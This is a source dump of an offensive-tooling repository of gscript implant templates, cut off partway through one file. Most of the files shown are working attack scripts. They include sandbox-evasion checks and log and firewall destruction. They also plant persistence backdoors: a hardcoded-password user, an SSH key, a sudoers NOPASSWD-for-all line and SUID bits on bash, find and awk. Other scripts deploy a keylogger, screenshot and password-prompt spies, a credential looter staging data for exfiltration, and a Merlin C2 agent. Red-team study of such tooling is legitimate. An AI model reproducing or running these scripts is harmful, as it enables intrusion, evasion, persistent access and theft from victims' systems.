├── .gitignore
├── README.md
├── anti-re
├── kill_date.gs
├── sandbox_cpu1.gs
├── sandbox_hostname.gs
└── sandbox_user.gs
├── attack
├── linux
│ ├── add_users.gs
│ ├── delete_logs.gs
│ ├── disable_firewall.gs
│ ├── goredloot_example.gs
│ ├── goredprompt_example.gs
│ ├── goredspy_example.gs
│ ├── keylog_spy.gs
│ ├── kitten-service.gs
│ ├── kittenz-installer.gs
│ ├── merlin_example.gs
│ ├── salt_install.gs
│ ├── sshkey_persistence.gs
│ ├── sudo_persistence.gs
│ └── suid_persistence.gs
├── multi
│ ├── crypto
│ │ ├── crypto_bytes_example.gs
│ │ └── crypto_string_example.gs
│ ├── dropper
│ │ └── merlin_example.gs
│ ├── encoding
│ │ └── encoding_example.gs
│ ├── exec
│ │ ├── exec_example.gs
│ │ └── execa_example.gs
│ ├── file
│ │ ├── delete_example.gs
│ │ └── write_examples.gs
│ ├── net
│ │ ├── httpd_example.gs
│ │ ├── net_tcp_example.gs
│ │ ├── net_udp_example.gs
│ │ ├── netcat_tcp_client_example.gs
│ │ └── netcat_tcp_server_example.gs
│ ├── rand
│ │ └── rand_example.gs
│ ├── requests
│ │ └── requests_example.gs
│ ├── test
│ │ ├── bettercap.gs
│ │ └── strings.gs
│ └── time
│ │ └── time_example.gs
├── os_x
│ ├── cronjob_persistence.gs
│ ├── delete_logs.gs
│ ├── disable_SIP.gs
│ ├── disable_filevault.gs
│ ├── disable_firewall.gs
│ ├── disable_gatekeeper.gs
│ ├── disable_littlesnitch.gs
│ ├── enable_ard.gs
│ ├── enable_autologin.gs
│ ├── enable_fileshares.gs
│ ├── enable_guest.gs
│ ├── enable_remote_ssh.gs
│ ├── enable_screensharing.gs
│ ├── goredloot_example.gs
│ ├── goredprompt_example.gs
│ ├── goredspy_example.gs
│ ├── grab_clipboard.gs
│ ├── https_exfiltration.gs
│ ├── keylogger_example.gs
│ ├── launch_agent_persistence.gs
│ ├── launch_daemon_persistence.gs
│ ├── launchctl_persistence.gs
│ ├── loginhook_persistence.gs
│ ├── looter_example.gs
│ ├── merlin_example.gs
│ ├── merlin_example2.gs
│ ├── osascript_prompt.gs
│ ├── prompter_example.gs
│ ├── sshkey_persistence.gs
│ ├── su_pam_persistence.gs
│ ├── tamper_histcontrol.gs
│ ├── trap_persistence.gs
│ └── xsvc_service_persistence.gs
└── windows
│ ├── Vyrus-Demo
│ └── epicMsf.gs
│ ├── delete_event_logs.gs
│ ├── delete_volume_shadow_copy.gs
│ ├── disable_adminApprovalMode.gs
│ ├── disable_defender.gs
│ ├── disable_localAdminFilter.gs
│ ├── disable_securityCenter.gs
│ ├── disable_uac.gs
│ ├── disable_winUpdates.gs
│ ├── disable_windows_firewall.gs
│ ├── enable_adminShares.gs
│ ├── enable_installElevated.gs
│ ├── enable_rdp.gs
│ ├── enable_smbv1.gs
│ ├── enable_stickykeys.gs
│ ├── enable_wdigest_credcache.gs
│ ├── enable_winrm.gs
│ ├── force_hidden_files.gs
│ ├── keylog_spy.gs
│ ├── merlin_example.gs
│ ├── net_user_creation.gs
│ ├── netntlm_downgrade.gs
│ ├── runkey_persistence.gs
│ ├── salt_install.gs
│ ├── screenshot_spy.gs
│ ├── shrink_logsize.gs
│ ├── startup_persistence.gs
│ └── userinit_persistence.gs
├── beta
├── anti-re
│ ├── sandbox_cpu1.gs
│ ├── sandbox_hostname.gs
│ ├── sandbox_ram1.gs
│ ├── sandbox_users.gs
│ ├── sandbox_users2.gs
│ └── windows
│ │ └── vm_regkeys.gs
├── attack
│ ├── README.md
│ ├── linux
│ │ ├── delete_logs.gs
│ │ ├── disable_linux_firewall.gs
│ │ ├── keylog_spy.gs
│ │ ├── screenshot_spy.gs
│ │ ├── sshkey_persistence.gs
│ │ ├── sudo_persistence.gs
│ │ └── suid_persistence.gs
│ ├── os_x
│ │ ├── cronjob_persistence.gs
│ │ ├── delete_logs.gs
│ │ ├── enable_remote_ssh.gs
│ │ ├── example_agent.plist
│ │ ├── example_daemon.plist
│ │ ├── grab_clipboard.gs
│ │ ├── https_log_exfiltration.gs
│ │ ├── keylog_spy.gs
│ │ ├── launch_agent_persistence.gs
│ │ ├── launch_daemon_persistence.gs
│ │ ├── launchctl_persistence.gs
│ │ ├── loginhook_persistence.gs
│ │ ├── logouthook_persistence.gs
│ │ ├── osascript_prompt.gs
│ │ ├── rccommon_persistence.gs
│ │ ├── screenshot_spy.gs
│ │ ├── service_persistence.gs
│ │ ├── tamper_histcontrol.gs
│ │ └── trap_persistence.gs
│ ├── skeleton.gs
│ └── windows
│ │ ├── delete_event_logs.gs
│ │ ├── delete_volume_shadow_copy.gs
│ │ ├── disable_windows_firewall.gs
│ │ ├── keylog_spy.gs
│ │ ├── net_user_creation.gs
│ │ ├── runkey_persistence.gs
│ │ ├── screenshot_spy.gs
│ │ └── startup_persistence.gs
└── ops
│ └── ensure_admin.gs
└── troll
└── windows
├── killall.gs
├── memz.gs
└── win_viz.gs
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 |
3 | # Binaries for programs and plugins
4 | *.exe
5 | *.exe~
6 | *.dll
7 | *.so
8 | *.dylib
9 |
10 | # Test binary, build with `go test -c`
11 | *.test
12 |
13 | # Output of the go coverage tool, specifically when used with LiteIDE
14 | *.out
15 |
16 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # gscripts
2 | A repo full of example gscripts
3 |
4 | Written for [gscript](https://github.com/gen0cide/gscript)
5 |
6 | [](https://asciinema.org/a/183244)
7 |
8 | # Video about the framework
9 | [Defcon 26 - Gscript Presentation](https://www.youtube.com/watch?v=8yjMlMf8NpQ)
10 |
11 |
12 | # How to use the framework
13 | [Defcon 26 - Gscript Workshop](https://github.com/ahhh/presentations/blob/master/DEFCON26%20GSCRIPT%20Workshop.pdf)
14 |
--------------------------------------------------------------------------------
/anti-re/kill_date.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Kill Date
3 | // Author: ahhh
4 | // Purpose: Kill the binary if it's being run after a certain date
5 | // Tactic: Use this to give your payloads an expiration date, such that they can't be repurposed after your operation
6 | // Gscript version: 1.0.0
7 |
8 | //go_import:runtime as funtime
9 |
10 | //priority:50
11 | //timeout:75
12 |
13 | function Deploy() {
14 | console.log("Testing Kill Date!");
15 | var kdate = "1545696000" // Christmas 2018
16 | var currentDate = G.time.GetUnix()
17 | if (currentDate >= kdate) {
18 | console.log("Detected a time after the kill date!");
19 | G.os.TerminateSelf();
20 | return false;
21 | }
22 | console.log("Done Testing Kill Date!");
23 | return true;
24 | }
25 |
26 |
--------------------------------------------------------------------------------
/anti-re/sandbox_cpu1.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_CPU_1
3 | // Author: ahhh
4 | // Purpose: Gets the computer's CPU count, if the machine only has one cpu we consider it a sandbox
5 | // Tactic: Has a low priority to run first and kill the process if it detects a sandbox
6 | // Gscript version: 1.0.0
7 |
8 | //go_import:runtime as funtime
9 |
10 |
11 | //priority:50
12 | //timeout:75
13 |
14 | function Deploy() {
15 | console.log("Testing Sandbox CPUs!");
16 |
17 | var cpucount = funtime.NumCPU();
18 | if (cpucount == 1) {
19 | console.log("Detected a single CPU, likly a sandbox!");
20 | G.os.TerminateSelf();
21 | return false;
22 | } else {
23 | return true;
24 | }
25 |
26 | console.log("Done Testing Sandbox CPUs!");
27 |
28 | return true;
29 | }
30 |
--------------------------------------------------------------------------------
/anti-re/sandbox_hostname.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Hostname
3 | // Author: ahhh
4 | // Purpose: Gets the computers hostname, converts it to caps, then checks against a list of well known sandbox hostnames
5 | // Gscript version: 1.0.0
6 | //
7 | //go_import:os as os2
8 |
9 | //priority:30
10 | //timeout:75
11 |
12 | function Deploy() {
13 | console.log("Testing Sandbox Hostname!");
14 | var hostnam = os2.Hostname();
15 | var hostnamez = hostnam[0].toUpperCase();
16 | console.log("Our hostname is: "+ hostnamez);
17 | if (hostnamez == "TEQUILABOOMBOOM" || hostnamez == "SANDBOX" || hostnamez == "VIRUS" || hostnamez == "MALWARE" || hostnamez == "MALTEST" || hostnamez == "PC" || hostnamez == "PSPUBWS-PC")
18 | {
19 | console.log("Sandbox detected, exiting");
20 | G.os.TerminateSelf();
21 | return false;
22 | }
23 | console.log("Done Testing Hostname!");
24 | return true;
25 | }
26 |
27 |
--------------------------------------------------------------------------------
/anti-re/sandbox_user.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Users2
3 | // Author: ahhh
4 | // Purpose: Gets the computer's Users, checks against a dynamic list of well known sandbox users
5 | // Gscript version: 1.0.0
6 |
7 | //go_import:os/user as user2
8 |
9 | //priority:30
10 | //timeout:75
11 |
12 | function Deploy() {
13 | console.log("Testing Sandbox Users 2!");
14 | // Whoami
15 | var myuser = user2.Current();
16 | console.log("user: "+Dump(myuser[0]));
17 | var user = (myuser[0]).toUpperCase();
18 | console.log(user);
19 | if (user == "MALTEST" || user == "TEQUILABOOMBOOM" || user == "WILBER" || user == "PSPUBWS")
20 | {
21 | console.log("Sandbox detected, exiting");
22 | G.os.TerminateSelf();
23 | return false;
24 | }
25 | return true;
26 | }
--------------------------------------------------------------------------------
/attack/linux/add_users.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: add user in linux
3 | // Author: duffffffff
4 | // Purpose: conviently add some users, in linux
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Tactic: Do thing right away
8 |
9 | //priority:200
10 | //timeout:150
11 |
12 | function Deploy() {
13 | //adduser nameOfTheAddedUser
14 | var response1 = G.exec.ExecuteCommand("useradd", ["-m", "-p", "lol123", "-s", "/bin/bash", "spoderman"]);
15 | console.log("Pid: "+response1[0]);
16 | console.log("stdout: "+response1[1]);
17 | console.log("stderr: "+response1[2]);
18 | console.log("exit code: "+response1[3]);
19 | console.log("go errors: "+Dump(response1[4]));
20 | console.log("done adding users")
21 | }
22 |
--------------------------------------------------------------------------------
/attack/linux/delete_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete logs
3 | // Author: ahhh
4 | // Purpose: deleting some logs on linux
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Tactic: Late pirority to run toward the end
8 |
9 | //priority:200
10 | //timeout:150
11 |
12 | //go_import:github.com/gen0cide/gscript/stdlib/exec as exec
13 |
14 | function Deploy() {
15 | //rm -rf /var/run/utmp /var/run/wtmp /var/run/btmp /var/log/
16 | var response = exec.ExecuteCommand("rm", ["-rf", "/var/run/utmp", "/var/run/wtmp", "/var/run/btmp", "/var/log/"]);
17 | console.log("Pid: "+response[0]);
18 | console.log("stdout: "+response[1]);
19 | console.log("stderr: "+response[2]);
20 | console.log("exit code: "+response[3]);
21 | console.log("go errors: "+Dump(response[4]));
22 | console.log("Removed /var/run/utmp, /var/run/wtmp, /var/run/btmp, and all of /var/log/");
23 | }
--------------------------------------------------------------------------------
/attack/linux/disable_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Linux Firewall
3 | // Author: ahhh
4 | // Purpose: Drops the linux firewall by dropping all of the iptables rules
5 | // Tactic: low pirority to earlier
6 | // Gscript version: 1.0.0
7 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
8 |
9 | //priority:90
10 | //timeout:150
11 |
12 | function Deploy() {
13 | console.log("Starting Disable Linux Firewall");
14 |
15 | var response = G.exec.ExecuteCommand("iptables", ["-L"]);
16 | console.log("Pid: "+response[0]);
17 | console.log("stdout: "+response[1]);
18 | console.log("stderr: "+response[2]);
19 | console.log("exit code: "+response[3]);
20 | console.log("go errors: "+Dump(response[4]));
21 |
22 | var response2 = G.exec.ExecuteCommand("iptables", ["--flush"]);
23 | console.log("Pid: "+response2[0]);
24 | console.log("stdout: "+response2[1]);
25 | console.log("stderr: "+response2[2]);
26 | console.log("exit code: "+response2[3]);
27 | console.log("go errors: "+Dump(response2[4]));
28 |
29 | console.log("Done Disable Linux Firewall");
30 | return true;
31 | }
32 |
--------------------------------------------------------------------------------
/attack/linux/goredloot_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GoRedLoot
3 | // Author: ahhh
4 | // Purpose: Gathers target keys from the victim and stages (compresses / encrypts) them for exfil
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Tactic: Late pirority to run toward the end, will compress and encrypt to a random outfile
8 | // Uses: GoRedLoot to take search and stage: https://github.com/ahhh/GoRedLoot
9 |
10 | //priority:200
11 | //timeout:200
12 |
13 | //go_import:os/user as user2
14 | //go_import:os as os2
15 |
16 | //import:/private/tmp/GoRedLoot.elf
17 |
18 | function Deploy() {
19 | console.log("Starting GoRedLoot");
20 | // Getting our asset
21 | var lootBin = GetAssetAsBytes("GoRedLoot.elf");
22 | console.log("errors: "+Dump(lootBin[1]));
23 |
24 | // Get user home directory
25 | var user = user2.Current();
26 | console.log(user[0]);
27 | var searchDir = user[0].HomeDir+"/";
28 |
29 | // Getting a random name and dropping file
30 | var temppath = os2.TempDir();
31 | var naming = G.rand.GetAlphaNumericString(6);
32 | var name = naming.toLowerCase();
33 | name = temppath+"/"+name;
34 | G.file.WriteFileFromBytes(name, lootBin[0]);
35 | console.log("dropped the GoRedLoot binary here: "+name);
36 |
37 | // Create random out file
38 | var outfile = G.rand.GetAlphaNumericString(5);
39 | outfile = "/tmp/"+outfile.toLowerCase();
40 |
41 | // Executing child proc
42 | var proc = G.exec.ExecuteCommandAsync(name, [searchDir, outfile]);
43 | console.log("err: "+Dump(proc[1]));
44 | console.log("pid: "+proc[0].Process.Pid);
45 |
46 | console.log("Done GoRedLoot");
47 | return true;
48 | }
--------------------------------------------------------------------------------
/attack/linux/goredprompt_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: GoRedPrompt
3 | // Author: ahhh
4 | // Purpose: Prompts the user for their password
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Uses: GoRedPrompt to take screenshots: https://github.com/ahhh/GoRedPrompt
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os as os2
13 |
14 | //import:/private/tmp/GoRedPrompt.elf
15 |
16 | function Deploy() {
17 | console.log("Starting GoRedPrompt");
18 | // Getting our asset
19 | var promptBin = GetAssetAsBytes("GoRedPrompt.elf");
20 | console.log("errors: "+Dump(promptBin[1]));
21 |
22 | // Getting a random name and dropping file
23 | var temppath = os2.TempDir();
24 | var naming = G.rand.GetAlphaString(6);
25 | var name = naming.toLowerCase();
26 | name = temppath+"/"+name;
27 | G.file.WriteFileFromBytes(name, promptBin[0]);
28 | console.log("dropped the goredprompt binary here: "+name);
29 |
30 | // Create random out file
31 | var outfile = G.rand.GetAlphaNumericString(5);
32 | outfile = "/tmp/"+outfile.toLowerCase();
33 |
34 | // Executing child proc
35 | var proc = G.exec.ExecuteCommandAsync(name, [outfile]);
36 | console.log("err: "+Dump(proc[1]));
37 | console.log("pid: "+proc[0].Process.Pid);
38 |
39 | console.log("Done GoRedPrompt");
40 | return true;
41 | }
--------------------------------------------------------------------------------
/attack/linux/goredspy_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every halfhour for the next 24 hours (48 x 1800)
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Uses: GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //go_import:os/user as user2
13 | //go_import:os as os2
14 |
15 | //import:/private/tmp/GoRedSpy.elf
16 |
17 | function Deploy() {
18 | console.log("Starting GoRedSpy");
19 | // Getting our asset
20 | var spyBin = GetAssetAsBytes("GoRedSpy.elf");
21 | console.log("errors: "+Dump(spyBin[1]));
22 |
23 | // Getting a random name and dropping file
24 | var temppath = os2.TempDir();
25 | var naming = G.rand.GetAlphaString(4);
26 | var name = naming.toLowerCase();
27 | name = temppath+"/"+name;
28 | G.file.WriteFileFromBytes(name, spyBin[0]);
29 | console.log("dropped the goredspy binary here: "+name);
30 |
31 | // Create random out dir
32 | var outdir = G.rand.GetAlphaString(3);
33 | outdir = "/tmp/"+outdir.toLowerCase();
34 | G.exec.ExecuteCommand("/bin/mkdir", [outdir]);
35 |
36 | // Executing child proc
37 | var proc = G.exec.ExecuteCommandAsync(name, ["-outDir", outdir, "-count", "48", "-delay", "1800s"]);
38 | console.log("err: "+Dump(proc[1]));
39 | console.log("pid: "+proc[0].Process.Pid);
40 |
41 | console.log("Done GoRedSpy");
42 | return true;
43 | }
--------------------------------------------------------------------------------
/attack/linux/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Starts recording keylogs, saves them in /var/log/skeylogger
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Tactic: Later check location of output log to retrieve keylogs
8 | // Uses: simple key keylogger https://github.com/gsingh93/simple-key-logger
9 | // Note: must be run as root
10 |
11 | //priority:150
12 | //timeout:150
13 |
14 | //go_import:os as os2
15 | //go_import:os/user as user2
16 |
17 | //import:/private/tmp/skeylogger
18 |
19 |
20 | function Deploy() {
21 | console.log("starting execution of keylogger spy");
22 | // Getting our asset
23 | var keylogBin = GetAssetAsBytes("skeylogger");
24 | console.log("errors: "+Dump(keylogBin[1]));
25 | // get user homedir
26 | var user = user2.Current();
27 | console.log("Our user is: "+user[0].Username);
28 | if (user[0].Username == "root") {
29 | // Getting a random string
30 | var temppath = os2.TempDir();
31 | var naming = G.rand.GetAlphaString(4);
32 | var name = naming.toLowerCase();
33 | name = temppath+"/"+name;
34 | G.file.WriteFileFromBytes(name, keylogBin[0]);
35 | console.log("dropped the spy binary here: "+name);
36 | G.exec.ExecuteCommandAsync(name, ["-l", "/tmp/log"]);
37 | } else {
38 | console.log("Must be run as root");
39 | }
40 | console.log("Done keylogger spy");
41 | return true;
42 | }
43 |
--------------------------------------------------------------------------------
/attack/linux/kitten-service.gs:
--------------------------------------------------------------------------------
1 | // Kittenz Service
2 | // Title: Kittenz Service
3 | // Author: VitaPluvia
4 | // Purpose: Persistently copies kitten.jpg into /tmp
5 | // Gscript version: 1.0.0
6 |
7 | //import:./kitten.jpg
8 |
9 | function Deploy () {
10 | var systemKitten = '/tmp/kitten.jpg';
11 | var kittenBytes = GetAssetAsBytes('kitten.jpg');
12 |
13 | while (1) {
14 | var kittenExists = G.file.CheckExists(systemKitten);
15 |
16 | if (!kittenExists) {
17 | G.file.WriteFileFromBytes(systemKitten, kittenBytes[0]);
18 | }
19 | Sleep(3);
20 | }
21 |
22 | return true;
23 | }
24 |
--------------------------------------------------------------------------------
/attack/linux/kittenz-installer.gs:
--------------------------------------------------------------------------------
1 | // Kittenz Service Installer
2 | // Title: Kittenz Service Installer
3 | // Author: VitaPluvia
4 | // Purpose: Installs kitten-service placing kitten.jpg in /tmp persistently
5 | // Gscript version: 1.0.0
6 |
7 | //import:/root/kitten-service
8 | //go_import:github.com/gen0cide/gscript/x/svc as svc
9 |
10 | var SERVICE_NAME = 'kittenz';
11 | var SERVICE_DIR = '/usr/bin/';
12 | var SERVICE_PATH = SERVICE_DIR + SERVICE_NAME;
13 | var PLACING_KITTENZ_MSG = 'Placing kitten-service into ' + SERVICE_PATH + '...';
14 | var CREATE_SERVICE_MSG = 'Creating Service...';
15 | var SERVICE_SANITY_MSG = 'Checking Service Health...';
16 | var INSTALLING_SERVICE_MSG = 'Installing kittenz Service!';
17 | var STARTING_SERVICE_MSG = 'Starting kittenz!';
18 | var SERVICE_COMPLETE = 'Service Started.';
19 |
20 | var settings = {
21 | name: SERVICE_NAME,
22 | display_name: "kittenz",
23 | description: "kittenz are in your system!",
24 | arguments: [],
25 | executable_path: SERVICE_PATH,
26 | working_directory: SERVICE_DIR,
27 | options: {}
28 | };
29 |
30 | function handleError (obj) {
31 | if (obj) {
32 | DebugConsole();
33 | console.log(obj.Error());
34 | throw new Error('Error: ', obj.Error());
35 | }
36 | }
37 |
38 | function Deploy () {
39 | var kittenService = GetAssetAsBytes('kitten-service');
40 |
41 | console.log(PLACING_KITTENZ_MSG);
42 | var writeError = G.file.WriteFileFromBytes(SERVICE_PATH, kittenService[0]);
43 | if (writeError) {
44 | console.log(writeError);
45 | return false;
46 | }
47 |
48 | console.log(CREATE_SERVICE_MSG);
49 | var svcRes = svc.NewFromJSON(settings);
50 | var svcObj = svcRes[0];
51 | handleError(svcRes[1]);
52 |
53 | console.log(SERVICE_SANITY_MSG);
54 | var svcCheckRes = svcObj.CheckConfig(true);
55 | handleError(svcCheckRes[1]);
56 |
57 | console.log(INSTALLING_SERVICE_MSG);
58 | handleError(svcObj.Install(true));
59 |
60 | console.log(STARTING_SERVICE_MSG);
61 | handleError(svcObj.Start());
62 |
63 | console.log(SERVICE_COMPLETE);
64 |
65 | return true;
66 | }
67 |
--------------------------------------------------------------------------------
/attack/linux/merlin_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //import:/private/tmp/merlinagent.elf
12 |
13 | //go_import:os as os
14 |
15 | function Deploy() {
16 | console.log("Starting to drop merlin binary");
17 | // Getting our asset
18 | var merlinBin = GetAssetAsBytes("merlinagent.elf");
19 | console.log("errors: "+Dump(merlinBin[1]));
20 | // Getting a random string
21 | var temppath = os.TempDir();
22 | var naming = G.rand.GetAlphaString(4);
23 | naming = naming.toLowerCase();
24 | fullpath = temppath+"/"+naming;
25 | console.log("file name: "+ fullpath);
26 | // Write payload
27 | errors = G.file.WriteFileFromBytes(fullpath, merlinBin[0]);
28 | console.log("errors: "+Dump(errors));
29 | // Run payload
30 | var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
31 | console.log("errors: "+Dump(running[1]));
32 | return true
33 | }
--------------------------------------------------------------------------------
/attack/linux/salt_install.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Salt Example
3 | // Author: ahhh
4 | // Purpose: Drtops salt installer, executes it, sets up minion config, restarts minion. WIP.
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //import:salt.minion
12 | //import:bootstrap-salt.sh
13 |
14 | //go_import:os as os
15 |
16 | function Deploy() {
17 | console.log("Starting to drop salt.minion config");
18 | // Getting our asset
19 | var saltBin = GetAssetAsBytes("salt.minion");
20 | console.log("errors: "+Dump(saltBin[1]));
21 | var saltInstaller = GetAssetAsBytes("bootstrap-salt.sh")
22 | console.log("errors: "+Dump(saltInstaller[1]));
23 |
24 | // Write and Run installer
25 | installpath = "/tmp/install.sh";
26 | console.log("file name: "+ installpath);
27 | Ierrors = G.file.WriteFileFromBytes(installpath, saltInstaller[0]);
28 | console.log("Ierrors: "+Dump(Ierrors));
29 | var run = G.exec.ExecuteCommand("sh", [installpath, "-P"]);
30 | console.log("errors: "+Dump(run[1]));
31 |
32 | if (run[1] == "") {
33 | // Write our config file
34 | fullpath = "/etc/salt/minion";
35 | console.log("file name: "+ fullpath);
36 | errors = G.file.WriteFileFromBytes(fullpath, saltBin[0]);
37 | console.log("errors: "+Dump(errors));
38 | // restart
39 | var running = G.exec.ExecuteCommand("service", ["salt-minion", "restart"]);
40 | console.log("errors: "+Dump(running[1]));
41 | }
42 |
43 | return true
44 | }
45 |
--------------------------------------------------------------------------------
/attack/linux/sshkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Title: SSH Key Persistence
2 | // Author: micahjmartin
3 | // Purpose: add a public ssh key to users accounts
4 | // Gscript version: 1.0.0
5 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1145
6 | // Note: Assumes ssh key access is already enabled
7 |
8 | //priority:110
9 | //timeout:75
10 |
11 | //go_import:os as os
12 | //go_import:os/user as user
13 |
14 | //import:/private/tmp/id_rsa.pub
15 |
16 | function Deploy() {
17 | // Getting our asset
18 | var pubKey = GetAssetAsBytes("id_rsa.pub");
19 | console.log("errors: "+pubKey[1]);
20 |
21 | // get user homedir
22 | var myUser = user.Current();
23 | console.log(myUser[0]);
24 | // make .ssh dir
25 | var dirname = myUser[0].HomeDir+"/.ssh/";
26 | var dirstat = os.Stat(dirname);
27 | if (os.IsNotExist(dirstat[1])) {
28 | G.exec.ExecuteCommand("/bin/mkdir", [dirname]);
29 | }
30 | //make authorize keys file
31 | var filename = myUser[0].HomeDir+ "/.ssh/authorized_keys";
32 | var stat = os.Stat(filename);
33 | if (os.IsNotExist(stat[1])) {
34 | errors = G.file.WriteFileFromBytes(filename, pubKey[0]);
35 | console.log("errors: "+Dump(errors));
36 | console.log("SSH key added");
37 | } else {
38 | var appendedFileError = G.file.AppendFileBytes(filename, pubKey[0]);
39 | console.log("errors: "+ Dump(appendedFileError));
40 | console.log("SSH key appended");
41 | }
42 | return true;
43 | }
44 |
--------------------------------------------------------------------------------
/attack/linux/sudo_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sudo Persistence
3 | // Author: ahhh
4 | // Purpose: adds everyone to the sudo group so they can easily priv esc
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1169
7 | // Note: must run implant as root
8 |
9 | //priority:100
10 | //timeout:150
11 |
12 | //go_import:os/user as user2
13 |
14 | function Deploy() {
15 | console.log("starting execution of Sudo Persistence");
16 | // get user homedir
17 | var user = user2.Current();
18 | console.log("Our user is: "+user[0].Username);
19 | if (user[0].Username == "root") {
20 | var err1 = G.file.AppendFileString("/etc/sudoers", "\nALL ALL=(ALL:ALL) NOPASSWD:ALL\n");
21 | console.log(Dump(err1));
22 | //var err2 = G.file.AppendFileString("/etc/sudoers.d/README", "\nALL ALL=(ALL:ALL) NOPASSWD:ALL\n");
23 | //console.log(err2);
24 | console.log("Set ALL to be able to sudo on every command");
25 | } else {
26 | console.log("Detected a non-root user, this needs to run as root!");
27 | //Halt();
28 | }
29 | console.log("done Sudo Persistence");
30 | return true;
31 | }
32 |
--------------------------------------------------------------------------------
/attack/linux/suid_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: SUID Persistence
3 | // Author: ahhh
4 | // Purpose: sets the sticky bit on bash as root, for easy future priv esc
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1166
7 | // Tactic: Later need to invoke "/bin/bash -p" to use SUID backdoor
8 | // Note: Must run implant as root
9 |
10 | //priority:90
11 | //timeout:150
12 |
13 | //go_import:os/user as user2
14 |
15 | function Deploy() {
16 | console.log("starting execution of SUID Persistence");
17 | // get user homedir
18 | var user = user2.Current();
19 | console.log("Our user is: "+user[0].Username);
20 | if (user[0].Username == "root") {
21 | // setting /bin/bash to U+S
22 | var err = G.exec.ExecuteCommand("chmod", ["u+s", "/bin/bash"]);
23 | console.log(Dump(err));
24 | err = G.exec.ExecuteCommand("chmod", ["u+x", "/bin/bash"]);
25 | console.log(Dump(err));
26 | console.log("Set /bin/bash");
27 | // setting /bin/zsh to U+S
28 | err = G.exec.ExecuteCommand("chmod", ["u+s", "/usr/bin/find"]);
29 | console.log(Dump(err));
30 | err = G.exec.ExecuteCommand("chmod", ["u+x", "/usr/bin/find"]);
31 | console.log(Dump(err));
32 | console.log("Set /bin/zsh");
33 | // setting awk
34 | // USAGE: awk '{ system("/bin/sh") }'
35 | err = G.exec.ExecuteCommand("chmod", ["u+s", "/usr/bin/awk"]);
36 | console.log(Dump(err));
37 | err = G.exec.ExecuteCommand("chmod", ["u+x", "/usr/bin/awk"]);
38 | console.log(Dump(err));
39 | console.log("Set /usr/bin/awk");
40 |
41 | } else {
42 | console.log("Detected a non-root user, this needs to run as root!");
43 | //Halt();
44 | }
45 |
46 | console.log("done SUID Persistence");
47 | return true;
48 | }
--------------------------------------------------------------------------------
/attack/multi/crypto/crypto_bytes_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Crypto Examples
3 | // Author: ahhh
4 | // Purpose: Testing a bunch of data encyption on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 |
13 | console.log("Starting EncodeStringAsBytes");
14 | var bytes = G.encoding.EncodeStringAsBytes("test");
15 | console.log("bytes: "+ bytes);
16 |
17 | console.log("Starting GetMD5FromBytes Command");
18 | var md5b = G.crypto.GetMD5FromBytes(bytes);
19 | console.log("MD5FromBytes: "+md5b);
20 |
21 | console.log("Starting GetSHA1FromBytes");
22 | var sha1b = G.crypto.GetSHA1FromBytes(bytes);
23 | console.log("SHA1FromBytes: "+ sha1b);
24 |
25 | return true;
26 | }
--------------------------------------------------------------------------------
/attack/multi/crypto/crypto_string_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Crypto String Examples
3 | // Author: ahhh
4 | // Purpose: Testing a bunch of data encyption on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //go_import:github.com/gen0cide/gscript/stdlib/crypto as crypto
11 |
12 | function Deploy() {
13 |
14 | console.log("Starting GetMD5FromString Command");
15 | var md5s = G.crypto.GetMD5FromString("test");
16 | console.log("MD5FromString: "+md5s);
17 |
